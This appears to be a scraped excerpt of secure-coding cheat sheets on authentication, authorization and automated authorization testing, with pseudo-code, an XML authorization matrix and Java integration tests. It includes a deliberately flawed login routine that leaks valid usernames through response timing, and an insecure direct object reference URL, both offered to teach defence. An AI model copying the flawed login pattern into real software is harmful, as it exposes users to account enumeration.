It is interesting to note that the business logic itself can bring a discrepancy factor related to the processing time taken. Indeed, depending on the implementation, the processing time can be significantly different according to the case (success vs failure) allowing an attacker to mount a time-based attack (delta of some seconds for example).

Example using pseudo-code for a login feature:

IF USER_EXISTS(username) THEN\n    password_hash=HASH(password)\n    IS_VALID=LOOKUP_CREDENTIALS_IN_STORE(username, password_hash)\n    IF NOT IS_VALID THEN\n        RETURN Error(\"Invalid Username or Password!\")\n    ENDIF\nELSE\n   RETURN Error(\"Invalid Username or Password!\")\nENDIF\n

It can be clearly seen that if the user doesn't exist, the application will directly throw an error. Otherwise, when the user exists and the password doesn't, it is apparent that there will be more processing before the application errors out. In return, the response time will be different for the same error, allowing the attacker to differentiate between a wrong username and a wrong password.

password_hash=HASH(password)\nIS_VALID=LOOKUP_CREDENTIALS_IN_STORE(username, password_hash)\nIF NOT IS_VALID THEN\n   RETURN Error(\"Invalid Username or Password!\")\nENDIF\n

This code will go through the same process no matter what the user or the password is, allowing the application to return in approximately the same response time.

The problem with returning a generic error message for the user is a User Experience (UX) matter. A legitimate user might feel confused with the generic messages, thus making it hard for them to use the application, and might after several retries, leave the application because of its complexity. The decision to return a generic error message can be determined based on the criticality of the application and its data. For example, for critical applications, the team can decide that under the failure scenario, a user will always be redirected to the support page and a generic error message will be returned.

Regarding the user enumeration itself, protection against brute-force attack is also effective because they prevent an attacker from applying the enumeration at scale. Usage of CAPTCHA can be applied on a feature for which a generic error message cannot be returned because the user experience must be preserved.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#incorrect-and-correct-response-examples","title":"Incorrect and correct response examples","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#login","title":"Login","text":"

Incorrect response examples:

Correct response example:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#password-recovery","title":"Password recovery","text":"

Incorrect response examples:

Correct response example:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#account-creation","title":"Account creation","text":"

Incorrect response examples:

Correct response example:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#error-codes-and-urls","title":"Error Codes and URLs","text":"

The application may return a different HTTP Error code depending on the authentication attempt response. It may respond with a 200 for a positive result and a 403 for a negative result. Even though a generic error page is shown to a user, the HTTP response code may differ which can leak information about whether the account is valid or not.

Error disclosure can also be used as a discrepancy factor, consult the error handling cheat sheet regarding the global handling of different errors in an application.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#protect-against-automated-attacks","title":"Protect Against Automated Attacks","text":"

There are a number of different types of automated attacks that attackers can use to try and compromise user accounts. The most common types are listed below:

Attack Type Description Brute Force Testing multiple passwords from a dictionary or other source against a single account. Credential Stuffing Testing username/password pairs obtained from the breach of another site. Password Spraying Testing a single weak password against a large number of different accounts.

Different protection mechanisms can be implemented to protect against these attacks. In many cases, these defences do not provide complete protection, but when a number of them are implemented in a defence-in-depth approach, a reasonable level of protection can be achieved.

The following sections will focus primarily on preventing brute-force attacks, although these controls can also be effective against other types of attacks. For further guidance on defending against credential stuffing and password spraying, see the Credential Stuffing Cheat Sheet.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#multi-factor-authentication","title":"Multi-Factor Authentication","text":"

Multi-factor authentication (MFA) is by far the best defence against the majority of password-related attacks, including brute-force attacks, with analysis by Microsoft suggesting that it would have stopped 99.9% of account compromises. As such, it should be implemented wherever possible; however, depending on the audience of the application, it may not be practical or feasible to enforce the use of MFA.

The Multifactor Authentication Cheat Sheet contains further guidance on implementing MFA.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#login-throttling","title":"Login Throttling","text":"

Login Throttling is a protocol used to prevent an attacker from making too many attempts at guessing a password through normal interactive means, it includes:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#account-lockout","title":"Account Lockout","text":"

The most common protection against these attacks is to implement account lockout, which prevents any more login attempts for a period after a certain number of failed logins.

The counter of failed logins should be associated with the account itself, rather than the source IP address, in order to prevent an attacker from making login attempts from a large number of different IP addresses. There are a number of different factors that should be considered when implementing an account lockout policy in order to find a balance between security and usability:

Rather than implementing a fixed lockout duration (e.g., ten minutes), some applications use an exponential lockout, where the lockout duration starts as a very short period (e.g., one second), but doubles after each failed login attempt.

When designing an account lockout system, care must be taken to prevent it from being used to cause a denial of service by locking out other users' accounts. One way this could be performed is to allow the user of the forgotten password functionality to log in, even if the account is locked out.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#captcha","title":"CAPTCHA","text":"

The use of an effective CAPTCHA can help to prevent automated login attempts against accounts. However, many CAPTCHA implementations have weaknesses that allow them to be solved using automated techniques or can be outsourced to services which can solve them. As such, the use of CAPTCHA should be viewed as a defence-in-depth control to make brute-force attacks more time consuming and expensive, rather than as a preventative.

It may be more user-friendly to only require a CAPTCHA be solved after a small number of failed login attempts, rather than requiring it from the very first login.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#security-questions-and-memorable-words","title":"Security Questions and Memorable Words","text":"

The addition of a security question or memorable word can also help protect against automated attacks, especially when the user is asked to enter a number of randomly chosen characters from the word. It should be noted that this does not constitute multi-factor authentication, as both factors are the same (something you know). Furthermore, security questions are often weak and have predictable answers, so they must be carefully chosen. The Choosing and Using Security Questions cheat sheet contains further guidance on this.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#logging-and-monitoring","title":"Logging and Monitoring","text":"

Enable logging and monitoring of authentication functions to detect attacks/failures on a real-time basis

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#use-of-authentication-protocols-that-require-no-password","title":"Use of authentication protocols that require no password","text":"

While authentication through a user/password combination and using multi-factor authentication is considered generally secure, there are use cases where it isn't considered the best option or even safe. Examples of this are third party applications that desire connecting to the web application, either from a mobile device, another website, desktop or other situations. When this happens, it is NOT considered safe to allow the third-party application to store the user/password combo, since then it extends the attack surface into their hands, where it isn't in your control. For this, and other use cases, there are several authentication protocols that can protect you from exposing your users' data to attackers.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#oauth","title":"OAuth","text":"

Open Authorization (OAuth) is a protocol that allows an application to authenticate against a server as a user, without requiring passwords or any third party server that acts as an identity provider. It uses a token generated by the server and provides how the authorization flows most occur, so that a client, such as a mobile application, can tell the server what user is using the service.

The recommendation is to use and implement OAuth 1.0a or OAuth 2.0 since the very first version (OAuth1.0) has been found to be vulnerable to session fixation.

OAuth 2.0 relies on HTTPS for security and is currently used and implemented by APIs from companies such as Facebook, Google, Twitter and Microsoft. OAuth1.0a is more difficult to use because it requires the use of cryptographic libraries for digital signatures. However, since OAuth1.0a does not rely on HTTPS for security, it can be more suited for higher-risk transactions.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#openid","title":"OpenId","text":"

OpenId is an HTTP-based protocol that uses identity providers to validate that a user is who they say they are. It is a very simple protocol which allows a service provider initiated way for single sign-on (SSO). This allows the user to re-use a single identity given to a trusted OpenId identity provider and be the same user in multiple websites, without the need to provide any website with the password, except for the OpenId identity provider.

Due to its simplicity and that it provides protection of passwords, OpenId has been well adopted. Some of the well-known identity providers for OpenId are Stack Exchange, Google, Facebook and Yahoo!

For non-enterprise environments, OpenId is considered a secure and often better choice, as long as the identity provider is of trust.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#saml","title":"SAML","text":"

Security Assertion Markup Language (SAML) is often considered to compete with OpenId. The most recommended version is 2.0 since it is very feature-complete and provides strong security. Like OpenId, SAML uses identity providers, but unlike OpenId, it is XML-based and provides more flexibility. SAML is based on browser redirects which send XML data. Furthermore, SAML isn't only initiated by a service provider; it can also be initiated from the identity provider. This allows the user to navigate through different portals while still being authenticated without having to do anything, making the process transparent.

While OpenId has taken most of the consumer market, SAML is often the choice for enterprise applications. The reason for this is often that there are few OpenId identity providers which are considered of enterprise-class (meaning that the way they validate the user identity doesn't have high standards required for enterprise identity). It is more common to see SAML being used inside of intranet websites, sometimes even using a server from the intranet as the identity provider.

In the past few years, applications like SAP ERP and SharePoint (SharePoint by using Active Directory Federation Services 2.0) have decided to use SAML 2.0 authentication as an often preferred method for single sign-on implementations whenever enterprise federation is required for web services and web applications.

See also: SAML Security Cheat Sheet

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#fido","title":"FIDO","text":"

The Fast Identity Online (FIDO) Alliance has created two protocols to facilitate online authentication: the Universal Authentication Framework (UAF) protocol and the Universal Second Factor (U2F) protocol. While UAF focuses on passwordless authentication, U2F allows the addition of a second factor to existing password-based authentication. Both protocols are based on a public key cryptography challenge-response model.

UAF takes advantage of existing security technologies present on devices for authentication including fingerprint sensors, cameras(face biometrics), microphones(voice biometrics), Trusted Execution Environments(TEEs), Secure Elements(SEs) and others. The protocol is designed to plug-in these device capabilities into a common authentication framework. UAF works with both native applications and web applications.

U2F augments password-based authentication using a hardware token (typically USB) that stores cryptographic authentication keys and uses them for signing. The user can use the same token as a second factor for multiple applications. U2F works with web applications. It provides protection against phishing by using the URL of the website to look up the stored authentication key.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#password-managers","title":"Password Managers","text":"

Password managers are programs, browser plugins or web services that automate management of large number of different credentials. Most password managers have functionality to allow users to easily use them on websites, either by pasting the passwords into the login form, or by simulating the user typing them in.

Web applications should not make password managers' job more difficult than necessary by observing the following recommendations:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html","title":"Authorization Cheat Sheet","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Authorization may be defined as \"the process of verifying that a requested action or service is approved for a specific entity\" (NIST). Authorization is distinct from authentication which is the process of verifying an entity's identity. When designing and developing a software solution, it is important to keep these distinctions in mind. A user who has been authenticated (perhaps by providing a username and password) is often not authorized to access every resource and perform every action that is technically possible through a system. For example, a web app may have both regular users and admins, with the admins being able to perform actions the average user is not privileged to do so, even though they have been authenticated. Additionally, authentication is not always required for accessing resources; an unauthenticated user may be authorized to access certain public resources, such as an image or login page, or even an entire web app.

The objective of this cheat sheet is to assist developers in implementing authorization logic that is robust, appropriate to the app's business context, maintainable, and scalable. The guidance provided in this cheat sheet should be applicable to all phases of the development lifecycle and flexible enough to meet the needs of diverse development environments.

Flaws related to authorization logic are a notable concern for web apps. Broken Access Control was ranked as the most concerning web security vulnerability in OWASP's 2021 Top 10 and asserted to have a \"High\" likelihood of exploit by MITRE's CWE program. Furthermore, according to Veracode's State of Software Vol. 10, Access Control was among the more common of OWASP's Top 10 risks to be involved in exploits and security incidents despite being among the least prevalent of those examined.

The potential impact resulting from exploitation of authorization flaws is highly variable, both in form and severity. Attackers may be able read, create, modify, or delete resources that were meant to be protected (thus jeopardizing their confidentiality, integrity, and/or availability); however, the actual impact of such actions is necessarily linked to the criticality and sensitivity of the compromised resources. Thus, the business cost of a successfully exploited authorization flaw can range from very low to extremely high.

Both entirely unauthenticated outsiders and authenticated (but not necessarily authorized) users can take advantage of authorization weaknesses. Although honest mistakes or carelessness on the part of non-malicious entities may enable authorization bypasses, malicious intent is typically required for access control threats to be fully realized. Horizontal privilege elevation (i.e. being able to access another user's resources) is an especially common weakness that an authenticated user may be able to take advantage of. Faults related to authorization control can allow malicious insiders and outsiders alike to view, modify, or delete sensitive resources of all forms (databases records, static files, personally identifiable information (PII), etc.) or perform actions, such as creating a new account or initiating a costly order, that they should not be privileged to do. Furthermore, if logging related to access control is not properly set-up, such authorization violations may go undetected or a least remain unattributable to a particular individual or group.

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#recommendations","title":"Recommendations","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#enforce-least-privileges","title":"Enforce Least Privileges","text":"

As a security concept, Least Privileges refers to the principle of assigning users only the minimum privileges necessary to complete their job. Although perhaps most commonly applied in system administration, this principle has relevance to the software developer as well. Least Privileges must be applied both horizontally and vertically. For example, even though both an accountant and sales representative may occupy the same level in an organization's hierarchy, both require access to different resources to perform their jobs. The accountant should likely not be granted access to a customer database and the sales representative should not be able to access payroll data. Similarly, the head of the sales department is likely to need more privileged access than their subordinates.

Failure to enforce least privileges in an application can jeopardize the confidentiality of sensitive resources. Mitigation strategies are applied primarily during the Architecture and Design phase (see CWE-272); however, the principle must be addressed throughout the SDLC.

Consider the following points and best practices:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#deny-by-default","title":"Deny by Default","text":"

Even when no access control rules are explicitly matched, the application cannot remain neutral when an entity is requesting access to a particular resource. The application must always make a decision, whether implicitly or explicitly, to either deny or permit the requested access. Logic errors and other mistakes relating to access control may happen, especially when access requirements are complex; consequently, one should not rely entirely on explicitly defined rules for matching all possible requests. For security purposes an application should be configured to deny access by default.

Consider the following points and best practices:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#validate-the-permissions-on-every-request","title":"Validate the Permissions on Every Request","text":"

Permission should be validated correctly on every request, regardless of whether the request was initiated by an AJAX script, server-side, or any other source. The technology used to perform such checks should allow for global, application-wide configuration rather than needing to be applied individually to every method or class. Remember an attacker only needs to find one way in. Even if just a single access control check is \"missed\", the confidentiality and/or integrity of a resource can be jeopardized. Validating permissions correctly on just the majority of requests is insufficient. Specific technologies that can help developers in performing such consistent permission checks include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#thoroughly-review-the-authorization-logic-of-chosen-tools-and-technologies-implementing-custom-logic-if-necessary","title":"Thoroughly Review the Authorization Logic of Chosen Tools and Technologies, Implementing Custom Logic if Necessary","text":"

Today's developers have access to vast amount of libraries, platforms, and frameworks that allow them to incorporate robust, complex logic into their apps with minimal effort. However, these frameworks and libraries must not be viewed as a quick panacea for all development problems; developers have a duty to use such frameworks responsibly and wisely. Two general concerns relevant to framework/library selection as relevant to proper access control are misconfiguration/lack of configuration on the part of the developer and vulnerabilities within the components themselves (see A6 and A9 for general guidance on these topics).

Even in an otherwise securely developed application, vulnerabilities in third-party components can allow an attacker to bypass normal authorization controls. Such concerns need not be restricted to unproven or poorly maintained projects, but affect even the most robust and popular libraries and frameworks. Writing complex, secure software is hard. Even the most competent developers, working on high-quality libraries and frameworks, will make mistakes. Assume any third-party component you incorporate into an application could be or become subject to an authorization vulnerability. Important considerations include:

Misconfiguration (or complete lack of configuration) is another major area in which the components developers build upon can lead to broken authorization. These components are typically intended to be relatively general purpose tools made to appeal to a wide audience. For all but the simplest use cases, these frameworks and libraries must be customized or supplemented with additional logic in order to meet the unique requirements of a particular app or environment. This consideration is especially important when security requirements, including authorization, are concerned. Notable configuration considerations for authorization include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#prefer-attribute-and-relationship-based-access-control-over-rbac","title":"Prefer Attribute and Relationship Based Access Control over RBAC","text":"

In software engineering, two basic forms of access control are widely utilized: Role-Based Access Control (RBAC) and Attribute-Based Access Control (ABAC). There is a third, more recent, model which has gained popularity: Relationship-Based Access Control (ReBAC). The decision between the models has significant implications for the entire SDLC and should be made as early as possible.

Although RBAC has a long history and remains popular among software developers today, ABAC and ReBAC should typically be preferred for application development. Their advantages over RBAC include:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#ensure-lookup-ids-are-not-accessible-even-when-guessed-or-cannot-be-tampered-with","title":"Ensure Lookup IDs are Not Accessible Even When Guessed or Cannot Be Tampered With","text":"

Applications often expose the internal object identifiers (such as an account number or Primary Key in a database) that are used to locate and reference an object. This ID may exposed as a query parameter, path variable, \"hidden\" form field or elsewhere. For example:

https://mybank.com/accountTransactions?acct_id=901

Based on this URL, one could reasonably assume that the application will return a listing of transactions and that the transactions returned will be restricted to a particular account - the account indicated in the acct_id param. But what would happen if the user changed the value of the acct_id param to another value such as 523. Will the user be able to view transactions associated with another account even if it does not belong to him? If not, will the failure simply be the result of the account \"523\" not existing/not being found or will it be due to a failed access control check? Although this example may be an oversimplification, it illustrates a very common security flaw in application development - CWE 639: Authorization Bypass Through User-Controlled Key. When exploited, this weakness can result in authorization bypasses, horizontal privilege escalation and, less commonly, vertical privilege escalation (see CWE-639). This type of vulnerability also represents a form of Insecure Direct Object Reference (IDOR). The following paragraphs will describe the weakness and possible mitigations.

In the example of above, the lookup ID was not only exposed to the user and readily tampered with, but also appears to have been a fairly predictable, perhaps sequential, value. While one can use various techniques to mask or randomize these IDs and make them hard to guess, such an approach is generally not sufficient by itself. A user should not be able to access a resource they do not have permissions simply because they are able to guess and manipulate that object's identifier in a query param or elsewhere. Rather than relying on some form of security through obscurity, the focus should be on controlling access to the underlying objects and/or the identifiers themselves. Recommended mitigations for this weakness include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#enforce-authorization-checks-on-static-resources","title":"Enforce Authorization Checks on Static Resources","text":"

The importance of securing static resources is often overlooked or at least overshadowed by other security concerns. Although securing databases and similar data stores often justly receive significant attention from security conscious teams, static resources must also be appropriately secured. Although unprotected static resources are certainly a problem for websites and web applications of all forms, in recent years, poorly secured resources in cloud storage offerings (such as Amazon S3 Buckets) have risen to prominence. When securing static resources, consider the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#verify-that-authorization-checks-are-performed-in-the-right-location","title":"Verify that Authorization Checks are Performed in the Right Location","text":"

Developers must never rely on client-side access control checks. While such checks may be permissible for improving the user experience, they should never be the decisive factor in granting or denying access to a resource; client-side logic is often easy to bypass. Access control checks must be performed server-side, at the gateway, or using serverless function (see OWASP ASVS 4.0.3, V1.4.1 and V4.1.1)

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#exit-safely-when-authorization-checks-fail","title":"Exit Safely when Authorization Checks Fail","text":"

Failed access control checks are a normal occurrence in a secured application; consequently, developers must plan for such failures and handle them securely. Improper handling of such failures can lead to the application being left in an unpredictable state (CWE-280: Improper Handling of Insufficient Permissions or Privileges). Specific recommendations include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#implement-appropriate-logging","title":"Implement Appropriate Logging","text":"

Logging is one of the most important detective controls in application security; insufficient logging and monitoring is recognized as among the most critical security risks in OWASP's Top Ten 2021. Appropriate logs can not only detect malicious activity, but are also invaluable resources in post-incident investigations, can be used to troubleshoot access control and other security related problems, and are useful in security auditing. Though easy to overlook during the initial design and requirements phase, logging is an important component of wholistic application security and must be incorporated into all phases of the SDLC. Recommendations for logging include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#create-unit-and-integration-test-cases-for-authorization-logic","title":"Create Unit and Integration Test Cases for Authorization Logic","text":"

Unit and integration testing are essential for verifying that an application performs as expected and consistently across changes. Flaws in access control logic can be subtle, particularly when requirements are complex; however, even a small logical or configuration error in access control can result in severe consequences. Although not a substitution for a dedicated security test or penetration test (see OWASP WSTG 4.5 for an excellent guide on this topic as it relates to access control), automated unit and integration testing of access control logic can help reduce the number of security flaws that make it into production. These tests are good at catching the \"low-hanging fruit\" of security issues but not more sophisticated attack vectors (OWASP SAMM: Security Testing).

Unit and integration testing should aim to incorporate many of the concepts explored in this document. For example, is access being denied by default? Does the application terminate safely when an access control check fails, even under abnormal conditions? Are ABAC policies being properly enforced? While simple unit and integrations test can never replace manual testing performed by a skilled hacker, they are an important tool for detecting and correcting security issues quickly and with far less resources than manual testing.

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#abac","title":"ABAC","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#general","title":"General","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#least-privilege","title":"Least Privilege","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#rbac","title":"RBAC","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#rebac","title":"ReBAC","text":""},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html","title":"Authorization Testing Automation Cheat Sheet","text":""},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Authorizations definition and implementation is one of the important protection measures of an application. They are defined in the creation phase of the project and, even if authorization issues are found when the application is initially released and submitted to a security audit before to going live, the most significant number of issues related to authorization come in the maintenance lifetime of the application.

This situation is often explained by the fact that features are added/modified and no review of the authorizations is performed on the application before the publishing of the new release, for cost or time issue reason.

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#context","title":"Context","text":"

In order to try to address this situation, it can be interesting to automate the evaluation of the authorizations definition and implementation on the application. This, to constantly ensure that implementation of the authorizations in the application is consistent with the authorizations' definition.

An authorization is often composed by 2 elements (also named dimensions): The Feature, and the Logical Role that can access it (sometime a third dimension named Data is added in order to define access that includes a filtering at business data level).

The representation of the different combinations of these 2 dimensions is often named an Authorization matrix and is often formalized in a spreadsheet.

During a test of an authorization, a Logical Role is also called a Point Of View.

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#objective","title":"Objective","text":"

This article describes a proposition of implementation in order to automate the tests of an authorization matrix.

This article assumes that 2 dimensions are used to represent an authorization for the technical proposition described and takes an application exposing REST services as an example.

The objective is to provide starting ideas/hints in order to create a tailored way of testing of the authorization matrix for the target application.

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#proposition","title":"Proposition","text":"

In order to achieve the full automation of the evaluation of the authorization matrix, the following actions have been performed:

  1. Formalize the authorization matrix in a pivot format file allowing:

    1. The processing by a program easily.
    2. To be read and updated by a human for the follow-up of the authorization combinations.
    3. Hierarchy in the information in order to easily materialize the different combinations.
    4. The maximum possible of independence from the technology and design used to implement the application exposing the features.
  2. Create a set of integration tests that fully use the authorization matrix pivot file as input source in order to evaluate the different combinations with:

    1. The minimum possible of maintenance when the authorization matrix pivot file is updated.
    2. A clear indication, in case of failed test, of the source authorization combination that does not respect the authorization matrix.
"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#authorization-matrix-pivot-file","title":"Authorization matrix pivot file","text":"

The XML format has been used to formalize the authorization matrix.

The XML structure contains 3 main sections:

This is an example of the XML used to represent the authorization:

Placeholders (values between {}) are used to mark location where test value must be placed by the integration tests if needed

  <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!--\n      This file materializes the authorization matrix for the different\n      services exposed by the system.\n\n      It will be used by the tests as a input source for the different tests cases:\n      1) Evaluate legitimate access and its correct implementation\n      2) Identify not legitimate access (authorization definition issue\n      on service implementation)\n\n      The \"name\" attribute is used to uniquely identify a SERVICE or a ROLE.\n  -->\n<authorization-matrix>\n\n<!-- Describe the possible logical roles used in the system, is used here to\n      provide a list+explanation\n      of the different roles (authorization level) -->\n<roles>\n<role name=\"ANONYMOUS\"\ndescription=\"Indicate that no authorization is needed\"/>\n<role name=\"BASIC\"\ndescription=\"Role affecting a standard user (lowest access right just above anonymous)\"/>\n<role name=\"ADMIN\"\ndescription=\"Role affecting an administrator user (highest access right)\"/>\n</roles>\n\n<!-- List and describe the available services exposed by the system and the associated\n      logical role(s) that can call them -->\n<services>\n<service name=\"ReadSingleMessage\" uri=\"/{messageId}\" http-method=\"GET\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"ANONYMOUS\"/>\n<role name=\"BASIC\"/>\n<role name=\"ADMIN\"/>\n</service>\n<service name=\"ReadAllMessages\" uri=\"/\" http-method=\"GET\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"ANONYMOUS\"/>\n<role name=\"BASIC\"/>\n<role name=\"ADMIN\"/>\n</service>\n<service name=\"CreateMessage\" uri=\"/\" http-method=\"PUT\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"BASIC\"/>\n<role name=\"ADMIN\"/>\n</service>\n<service name=\"DeleteMessage\" uri=\"/{messageId}\" http-method=\"DELETE\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"ADMIN\"/>\n</service>\n</services>\n\n<!-- Provide a test payload for each service if needed -->\n<services-testing>\n<service name=\"ReadSingleMessage\">\n<payload/>\n</service>\n<service name=\"ReadAllMessages\">\n<payload/>\n</service>\n<service name=\"CreateMessage\">\n<payload content-type=\"application/json\">\n{\"content\":\"test\"}\n              </payload>\n</service>\n<service name=\"DeleteMessage\">\n<payload/>\n</service>\n</services-testing>\n\n</authorization-matrix>\n
"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#integration-tests","title":"Integration tests","text":"

Integration tests are implemented using a maximum of factorized code and one test case by Point Of View (POV) has been created in order to group the verifications by profile of access level (logical role) and facilitate the rendering/identification of the errors.

Parsing, object mapping and access to the authorization matrix information has been implemented using XML marshalling/unmarshalling built-in features provided by the technology used to implement the tests (JAXB here) in order to limit the code to the one in charge of performing the tests.

This is the implementation of the integration tests case class:

  import org.owasp.pocauthztesting.enumeration.SecurityRole;\nimport org.owasp.pocauthztesting.service.AuthService;\nimport org.owasp.pocauthztesting.vo.AuthorizationMatrix;\nimport org.apache.http.client.methods.CloseableHttpResponse;\nimport org.apache.http.client.methods.HttpDelete;\nimport org.apache.http.client.methods.HttpGet;\nimport org.apache.http.client.methods.HttpPut;\nimport org.apache.http.client.methods.HttpRequestBase;\nimport org.apache.http.entity.StringEntity;\nimport org.apache.http.impl.client.CloseableHttpClient;\nimport org.apache.http.impl.client.HttpClients;\nimport org.junit.Assert;\nimport org.junit.BeforeClass;\nimport org.junit.Test;\nimport org.xml.sax.InputSource;\nimport javax.xml.bind.JAXBContext;\nimport javax.xml.parsers.SAXParserFactory;\nimport javax.xml.transform.Source;\nimport javax.xml.transform.sax.SAXSource;\nimport java.io.File;\nimport java.io.FileInputStream;\nimport java.util.ArrayList;\nimport java.util.List;\nimport java.util.Optional;\n\n/**\n   * Integration Test cases in charge of validate the correct implementation of the authorization matrix.\n   * Create on test case by logical role that will test access on all services exposed by the system.\n   * Implements here focus on readability\n   */\npublic class AuthorizationMatrixIT {\n\n/**\n       * Object representation of the authorization matrix\n       */\nprivate static AuthorizationMatrix AUTHZ_MATRIX;\n\nprivate static final String BASE_URL = \"http://localhost:8080\";\n\n\n/**\n       * Load the authorization matrix in objects tree\n       *\n       * @throws Exception If any error occurs\n       */\n@BeforeClass\npublic static void globalInit() throws Exception {\ntry (FileInputStream fis = new FileInputStream(new File(\"authorization-matrix.xml\"))) {\nSAXParserFactory spf = SAXParserFactory.newInstance();\nspf.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nspf.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\nspf.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);\nSource xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(), new InputSource(fis));\nJAXBContext jc = JAXBContext.newInstance(AuthorizationMatrix.class);\nAUTHZ_MATRIX = (AuthorizationMatrix) jc.createUnmarshaller().unmarshal(xmlSource);\n}\n}\n\n/**\n       * Test access to the services from a anonymous user.\n       *\n       * @throws Exception\n       */\n@Test\npublic void testAccessUsingAnonymousUserPointOfView() throws Exception {\n//Run the tests - No access token here\nList<String> errors = executeTestWithPointOfView(SecurityRole.ANONYMOUS, null);\n//Verify the test results\nAssert.assertEquals(\"Access issues detected using the ANONYMOUS USER point of view:\\n\" + formatErrorsList(errors), 0, errors.size());\n}\n\n/**\n       * Test access to the services from a basic user.\n       *\n       * @throws Exception\n       */\n@Test\npublic void testAccessUsingBasicUserPointOfView() throws Exception {\n//Get access token representing the authorization for the associated point of view\nString accessToken = generateTestCaseAccessToken(\"basic\", SecurityRole.BASIC);\n//Run the tests\nList<String> errors = executeTestWithPointOfView(SecurityRole.BASIC, accessToken);\n//Verify the test results\nAssert.assertEquals(\"Access issues detected using the BASIC USER point of view:\\n \" + formatErrorsList(errors), 0, errors.size());\n}\n\n/**\n       * Test access to the services from a administrator user.\n       *\n       * @throws Exception\n       */\n@Test\npublic void testAccessUsingAdministratorUserPointOfView() throws Exception {\n//Get access token representing the authorization for the associated point of view\nString accessToken = generateTestCaseAccessToken(\"admin\", SecurityRole.ADMIN);\n//Run the tests\nList<String> errors = executeTestWithPointOfView(SecurityRole.ADMIN, accessToken);\n//Verify the test results\nAssert.assertEquals(\"Access issues detected using the ADMIN USER point of view:\\n\" + formatErrorsList(errors), 0, errors.size());\n}\n\n/**\n       * Evaluate the access to all service using the point of view (POV) specified.\n       *\n       * @param pointOfView Point of view to use\n       * @param accessToken Access token that is linked to the point of view in terms of authorization.\n       * @return List of errors detected\n       * @throws Exception If any error occurs\n       */\nprivate List<String> executeTestWithPointOfView(SecurityRole pointOfView, String accessToken) throws Exception {\nList<String> errors = new ArrayList<>();\nString errorMessageTplForUnexpectedReturnCode = \"The service '%s' when called with POV '%s' return a response code %s that is not the expected one in allowed or denied case.\";\nString errorMessageTplForIncorrectReturnCode = \"The service '%s' when called with POV '%s' return a response code %s that is not the expected one (%s expected).\";\nString fatalErrorMessageTpl = \"The service '%s' when called with POV %s meet the error: %s\";\n\n//Get the list of services to call\nList<AuthorizationMatrix.Services.Service> services = AUTHZ_MATRIX.getServices().getService();\n\n//Get the list of services test payload to use\nList<AuthorizationMatrix.ServicesTesting.Service> servicesTestPayload = AUTHZ_MATRIX.getServicesTesting().getService();\n\n//Call all services sequentially (no special focus on performance here)\nservices.forEach(service -> {\n//Get the service test payload for the current service\nString payload = null;\nString payloadContentType = null;\nOptional<AuthorizationMatrix.ServicesTesting.Service> serviceTesting = servicesTestPayload.stream().filter(srvPld -> srvPld.getName().equals(service.getName())).findFirst();\nif (serviceTesting.isPresent()) {\npayload = serviceTesting.get().getPayload().getValue();\npayloadContentType = serviceTesting.get().getPayload().getContentType();\n}\n//Call the service and verify if the response is consistent\ntry {\n//Call the service\nint serviceResponseCode = callService(service.getUri(), payload, payloadContentType, service.getHttpMethod(), accessToken);\n//Check if the role represented by the specified point of view is defined 